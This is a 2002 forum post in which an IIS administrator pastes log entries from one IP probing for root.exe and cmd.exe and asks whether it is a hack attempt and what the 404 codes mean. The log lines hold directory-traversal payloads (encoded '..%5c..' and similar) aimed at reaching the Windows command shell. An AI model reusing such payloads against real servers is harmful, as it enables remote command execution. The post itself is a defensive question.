|
-
February 28th, 2002, 08:46 PM
#1
Junior Member
Hack Attempt ? on IIS ? Log Files ?
Hi people,
i would like to hear some opinions here please ...
Im starting to find more and more the following lines on one of my server log files:
01:11:14 196.31.110.211 GET /scripts/root.exe 404
01:11:15 196.31.110.211 GET /MSADC/root.exe 404
01:11:17 196.31.110.211 GET /c/winnt/system32/cmd.exe 404
01:11:18 196.31.110.211 GET /d/winnt/system32/cmd.exe 404
01:11:20 196.31.110.211 GET /scripts/..%5c../winnt/system32/cmd.exe 404
01:11:21 196.31.110.211 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
01:11:23 196.31.110.211 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
01:11:24 196.31.110.211 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404
01:11:25 196.31.110.211 GET /scripts/..Á../winnt/system32/cmd.exe 404
01:11:27 196.31.110.211 GET /scripts/winnt/system32/cmd.exe 404
01:11:28 196.31.110.211 GET /scripts/../../winnt/system32/cmd.exe 404
01:11:30 196.31.110.211 GET /scripts/..\../winnt/system32/cmd.exe 404
01:11:31 196.31.110.211 GET /scripts/..S5c../winnt/system32/cmd.exe 404
01:11:32 196.31.110.211 GET /scripts/..S5c../winnt/system32/cmd.exe 404
01:11:34 196.31.110.211 GET /scripts/..%5c../winnt/system32/cmd.exe 404
01:11:35 196.31.110.211 GET /scripts/..%2f../winnt/system32/cmd.exe 404
If im not wrong ... which i think is the case this is merely a hack attemp,
NOW - question here .... the resulting code 404 is a denial result on the iis server right ?
a resulting 200 code will be an accepted query , please tell me if im not wrong.
Also, is anybody familiar with the type of hack this people are trying to use on my server ? just by reading the lines i can say they are trying to execute the dos prompt of my server.
Is this an old hack ? how new is it ?
Could it really be a real live threat on my system ? or it basically looks like a "script-kiddie" work ?
I would like to hear your ideas ... suggestions ...
Thanks
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|